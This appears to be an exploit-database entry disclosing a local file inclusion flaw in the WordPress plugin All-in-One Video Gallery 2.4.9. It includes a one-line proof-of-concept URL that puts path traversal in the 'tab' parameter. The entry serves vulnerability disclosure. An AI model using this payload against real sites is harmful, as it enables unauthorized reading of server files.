[] NeoSense
E X P L O I T S
title author type platform port cve id

WordPress Plugin All-in-One Video Gallery plugin 2.4.9 - Local File Inclusion (LFI)

Author: Mohamed Magdy Abumusilm
type: webapps
platform: php
port: 
date_added: 2021-12-03 
date_updated: 2021-12-03 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comall-in-one-video-gallery.2.4.9.zip
# Exploit Title: WordPress Plugin All-in-One Video Gallery plugin 2.4.9 - Local File Inclusion (LFI)
# Exploit Author: Mohamed Magdy Abumusilm Aka m19o
# Software: All-in-One Video Gallery plugin
# Version: <= 2.4.9
# Tested on: Windows,linux

Poc: https://example.com/wordpress/wp-admin/admin.php?page=all-in-one-video-gallery&tab=../../../../../poc

Decription : Authenticated user can exploit LFI vulnerability in tab parameter.

Vulnerable code block : https://i.ibb.co/hXRcSQp/1123.png

You can find a writeup at my blog : https://m19o.github.io/posts/How-i-found-my-first-0day/
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.